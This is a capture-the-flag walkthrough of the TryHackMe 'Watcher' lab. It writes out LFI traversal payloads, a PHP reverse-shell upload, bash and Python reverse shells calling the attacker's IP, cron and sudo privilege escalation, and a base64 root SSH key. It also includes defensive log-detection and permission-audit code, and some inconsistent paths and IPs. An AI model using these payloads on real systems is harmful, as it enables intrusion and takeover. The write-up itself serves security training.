Enumeration
Starting off with an nmap scan, I find that FTP, SSH and HTTP are open.
root@kali:~/tryhackme/watcher# nmap -sC -sV 10.10.180.180
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-17 20:44 EST
Nmap scan report for 10.10.180.180
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e1:80:ec:1f:26:9e:32:eb:27:3f:26:ac:d2:37:ba:96 (RSA)
|   256 36:ff:70:11:05:8e:d4:50:7a:29:91:58:75:ac:2e:76 (ECDSA)
|_  256 48:d2:3e:45:da:0c:f0:f6:65:4e:f9:78:97:37:aa:8a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Jekyll v4.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Corkplacemats
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Running gobuster to find directories, I discover post.php and robots.txt.
root@kali:~/tryhackme/watcher# gobuster dir -u 10.10.180.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.180.180
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt
[+] Timeout:        10s
===============================================================
2021/02/17 20:45:30 Starting gobuster
===============================================================
/index.php (Status: 200)
/images (Status: 301)
/post.php (Status: 200)
/css (Status: 301)
/robots.txt (Status: 200)
Flag 1
Going to robots.txt, I find two Allow entries.
Navigating to 10.10.180.180/flag.txt, I obtain the first flag.
Flag 2
Trying to access the /secret_file_do_not_read.txt file, I receive a 403 error.
Going back to my gobuster results, I had found /post.php. Navigating there, the page loads but returns nothing.
I could try fuzzing, but first I went back to the home page and looked at the source code. Here, I find that post.php takes an argument named post.
Testing this, I find it is vulnerable to local file inclusion by changing the URL to post.php?post=../../../../../../etc/passwd
I want to read the /secret_file_do_not_read.txt file that I did not have permission to read earlier. Reading it through the LFI vulnerability works, and I find FTP credentials.
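As an added, defender-side example (not part of this writeup or the room), the Python check below runs over access-log lines and flags post.php requests whose post parameter escapes the include directory, including percent-encoded and double-encoded variants; it also covers the upload-then-include step used later for the reverse shell. The log lines are constructed, and the include base /var/www/html/posts is an assumption, since the real post.php source is not shown.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache access-log lines (not captured from the room) modelled on
# the post.php?post= requests used above; the benign value is an assumption.
SAMPLE_LOG = """\
10.2.8.75 - - [17/Feb/2021:20:50:01 -0500] "GET /post.php?post=post1.php HTTP/1.1" 200 1432
10.2.8.75 - - [17/Feb/2021:20:52:13 -0500] "GET /post.php?post=../../../../../../etc/passwd HTTP/1.1" 200 2611
10.2.8.75 - - [17/Feb/2021:20:53:40 -0500] "GET /post.php?post=..%2f..%2f..%2fsecret_file_do_not_read.txt HTTP/1.1" 200 312
10.2.8.75 - - [18/Feb/2021:02:13:49 -0500] "GET /post.php?post=../../../../../../../srv/ftp/files/php-reverse-shell.php HTTP/1.1" 200 0
10.2.8.75 - - [17/Feb/2021:20:45:30 -0500] "GET /robots.txt HTTP/1.1" 200 60
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
POSTS_DIR = "/var/www/html/posts"  # assumed include base; the real layout is not known

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so ..%252f does not slip past the check."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_include(value, base=POSTS_DIR):
    """Return why `value` is unsafe to include relative to `base`, or None."""
    value = fully_decode(value)
    if value.startswith("/"):
        return "absolute path"
    resolved = posixpath.normpath(posixpath.join(base, value))
    if resolved != base and not resolved.startswith(base + "/"):
        return "traversal outside base"
    return None

def scan_log(text):
    # Returns (decoded post value, reason) for every suspicious post.php request.
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group("target")) if m else None
        if not url or url.path != "/post.php":
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("post", []):
            reason = classify_include(value)
            if reason:
                hits.append((fully_decode(value), reason))
    return hits
```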
Using these credentials, I can log in to FTP and download the flag_2.txt file.
root@kali:~/tryhackme/watcher# ftp 10.10.180.180
Connected to 10.10.180.180.
220 (vsFTPd 3.0.3)
Name (10.10.180.180:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.
ftp> get flag_2.txt
local: flag_2.txt remote: flag_2.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for flag_2.txt (21 bytes).
226 Transfer complete.
21 bytes received in 0.00 secs (15.2022 kB/s)
I can now read the second flag
Flag 3
Looking at the FTP server, I am allowed to upload into the /files folder.
ftp> dir -a
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 .
dr-xr-xr-x    3 65534    65534        4096 Dec 03 01:58 ..
drwxr-xr-x    2 1001     1001         4096 Feb 17 23:31 files
-rw-r--r--    1 0        0              21 Dec 03 01:58 flag_2.txt
226 Directory send OK.
I have the ability to upload files via FTP and can then reach those files through the LFI vulnerability. I also know the files directory is located at /home/ftpuser/ftp/files, thanks to the note that gave me the FTP credentials. This will allow me to get a reverse shell. To start, I download a PHP reverse shell and edit the IP address. Then I upload it to the files directory over FTP.
ftp> put php-reverse-shell.php
local: php-reverse-shell.php remote: php-reverse-shell.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5491 bytes sent in 0.00 secs (137.8059 MB/s)
Now that the file is uploaded, I start a netcat listener. Then, using the LFI vulnerability, I request the PHP file so that it executes.
curl http://10.10.180.180/post.php?post=../../../../../../../srv/ftp/files/php-reverse-shell.php
Looking at my netcat listener, I see the connection come back.
root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 56586
Linux watcher 4.15.0-128-generic #131-Ubuntu SMP Wed Dec 9 06:57:35 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 02:13:50 up  3:00,  2 users,  load average: 0.00, 0.00, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
will     pts/6    10.2.8.75        00:50   33:34   0.31s  0.31s -bash
root     pts/7    10.2.8.75        01:41   32:37   0.02s  0.02s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
I then upgrade the shell to a proper TTY using python3.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@watcher:/$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# fg
www-data@watcher:/$
I can now read the third flag under /var/www/html/more_secrets_a9f10a
Flag 4
As www-data, I see I am allowed to run any command as the toby user
www-data@watcher:/$ sudo -l
Matching Defaults entries for www-data on watcher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on watcher:
    (toby) NOPASSWD: ALL
I can easily switch to the toby user without a password by executing bash through sudo.
www-data@watcher:/$ sudo -u toby /bin/bash
toby@watcher:/$
As toby, I can now read flag 4
Flag 5
Under toby’s home directory, I find a note stating that cron jobs are running, likely under the jobs directory.
toby@watcher:~$ ls
flag_4.txt  jobs  note.txt
toby@watcher:~$ cat note.txt
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.
This one is easy to find, but you could also use pspy to monitor processes and spot running cron jobs. Upload the pspy64 binary, then execute it.
toby@watcher:~$ wget 10.2.8.75/pspy64
--2021-02-18 02:25:49--  http://10.2.8.75/pspy64
Connecting to 10.2.8.75:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M   463KB/s    in 7.6s

2021-02-18 02:25:57 (395 KB/s) - 'pspy64' saved [3078592/3078592]

toby@watcher:~$ chmod +x pspy64
toby@watcher:~$ ./pspy64
Looking at the results, I see that the cow.sh file under /home/toby/jobs is a cron job run every minute.
2021/02/18 02:27:01 CMD: UID=1002 PID=1832   |
2021/02/18 02:27:01 CMD: UID=1002 PID=1831   | /bin/bash /home/toby/jobs/cow.sh
2021/02/18 02:27:01 CMD: UID=1002 PID=1830   | /bin/sh -c /home/toby/jobs/cow.sh
Looking at this file, I see my current user can edit it
toby@watcher:~/jobs$ ls -la cow.sh
-rwxr-xr-x 1 toby toby 46 Dec  3 03:31 cow.sh
I put a bash reverse shell at the bottom of the script to call back to my local machine
toby@watcher:~/jobs$ echo "bash -i >& /dev/tcp/10.2.8.75/8080 0>&1" >> cow.sh
After that, I set up my netcat listener and wait for less than a minute. I receive a connection back as the mat user.
root@kali:~/tryhackme/watcher# nc -lvnp 8080
listening on [any] 8080 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 40798
bash: cannot set terminal process group (1887): Inappropriate ioctl for device
bash: no job control in this shell
mat@watcher:~$
I can now read the fifth flag.
Flag 6
There is a note left on mat’s desktop from the will user. It says I can run a python script as him using sudo.
mat@watcher:~$ cat note.txt
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will
Running sudo -l confirms this.
mat@watcher:~$ sudo -l
Matching Defaults entries for mat on watcher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mat may run the following commands on watcher:
    (will) NOPASSWD: /usr/bin/python3 /home/mat/scripts/will_script.py *
Reading the script we can run as will, I see it imports os, sys and cmd.
mat@watcher:~/scripts$ cat will_script.py
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])
whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
    print("Invalid command!")
    exit()

os.system(cmd)
Looking at the file permissions, I see my current user owns cmd.py. This means I can insert commands into cmd.py, and when I run will_script.py they will execute.
mat@watcher:~/scripts$ ls -la
total 16
drwxrwxr-x 2 will will 4096 Dec  3 03:31 .
drwxr-xr-x 6 mat  mat  4096 Dec  3 03:31 ..
-rw-r--r-- 1 mat  mat   133 Dec  3 03:31 cmd.py
-rw-r--r-- 1 will will  208 Dec  3 01:58 will_script.py
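The cow.sh cron job (owned by toby, run as mat) and this sudo rule (will_script.py run as will while mat owns the cmd.py it imports) share one root cause: a file executed in a more privileged context is writable by a less privileged account. The Python audit below, added here and not part of the room or this writeup, walks a path and its parent directories for that condition; python3 puts the script's own directory first on sys.path, which is why the script audit also covers sibling .py modules. The file names and uid in the usage comment are placeholders.

```python
import os
import stat
import sys
from pathlib import Path

def audit_executed_path(path, runas_uid):
    """Findings for a file that cron or a sudo rule will execute as `runas_uid`.

    Each component from the file up to / must be owned by root or by the run-as
    user and must not be group/other writable; otherwise another account can
    change what gets executed. Sticky world-writable dirs like /tmp are tolerated.
    """
    findings = []
    target = Path(path).resolve()
    for node in [target, *target.parents]:
        st = node.stat()
        if st.st_uid not in (0, runas_uid):
            findings.append(f"{node}: owned by uid {st.st_uid}, not root or uid {runas_uid}")
        loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
        if loose and not sticky_dir:
            findings.append(f"{node}: group/other writable ({stat.filemode(st.st_mode)})")
    return findings

def audit_python_script(script, runas_uid):
    """Audit a script run via sudo as `runas_uid` plus every .py beside it.

    python3 puts the script's own directory first on sys.path, so a sibling
    module (cmd.py here) is imported before the script's own checks run.
    """
    script = Path(script).resolve()
    findings = audit_executed_path(script, runas_uid)
    for sibling in sorted(script.parent.glob("*.py")):
        if sibling != script:
            findings += [f for f in audit_executed_path(sibling, runas_uid)
                         if f.startswith(str(sibling))]
    return findings

if __name__ == "__main__":
    # usage: audit.py <run-as uid> <script-or-cron-file>...   (hypothetical file name)
    uid = int(sys.argv[1])
    for arg in sys.argv[2:]:
        fn = audit_python_script if arg.endswith(".py") else audit_executed_path
        for finding in fn(arg, uid) or [f"{arg}: OK"]:
            print(finding)
```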
I grab a python reverse shell and insert it into cmd.py.
mat@watcher:~/scripts$ echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.9.2.255',9003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py
Running will_script.py as will with the following command gets us a shell.
mat@watcher:~/scripts$ sudo -u will python3 /home/mat/scripts/will_script.py cmd.py
Looking at my netcat listener, I receive a connection back as will.
root@kali:~/tryhackme/watcher# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.2.8.75] from (UNKNOWN) [10.10.180.180] 38226
$ whoami
will
I upgrade the shell to a proper TTY using python3.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
will@watcher:~/scripts$ ^Z
[1]+  Stopped                 nc -lvnp 1234
root@kali:~/tryhackme/watcher# stty raw -echo
root@kali:~/tryhackme/watcher# nc -lvnp 1234
will@watcher:~/scripts$
Now I can read the sixth flag.
Flag 7
Looking into the will user, I find he is part of the adm group.
will@watcher:/home/will$ id
uid=1000(will) gid=1000(will) groups=1000(will),4(adm)
Since this is an unusual group, I want to find out whether any files belong to it. Here, I find a file named key.b64.
will@watcher:/home/will$ find / -group adm
/opt/backups
/opt/backups/key.b64
Reading the file shows a large base64 value
will@watcher:/home/will$ cat /opt/backups/key.b64 LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45 ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3 YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5 cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3 c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2 TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2 TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0 
bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4 NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4 STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo= |
Decoding this base64 value reveals an id_rsa private key.
will@watcher:/home/will$ cat /opt/backups/key.b64 | base64 -d
-----BEGIN RSA PRIVATE KEY-----
[private key body omitted]
-----END RSA PRIVATE KEY-----
I copy this id_rsa to my local machine and change the file permissions so it is usable.
root@kali:~/tryhackme/watcher# chmod 600 id_rsa
Testing this id_rsa against the root account, I find it is valid and lets me log in.
root@kali:~/tryhackme/watcher# ssh -i id_rsa root@10.10.180.180
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Feb 18 02:48:28 UTC 2021

  System load:  0.0               Processes:             122
  Usage of /:   22.3% of 18.57GB  Users logged in:       0
  Memory usage: 38%               IP address for eth0:   10.10.180.180
  Swap usage:   0%                IP address for lxdbr0: 10.14.179.1

33 packages can be updated.
0 updates are security updates.

Last login: Thu Dec  3 03:25:38 2020
root@watcher:~#
As root, I can now read the final flag.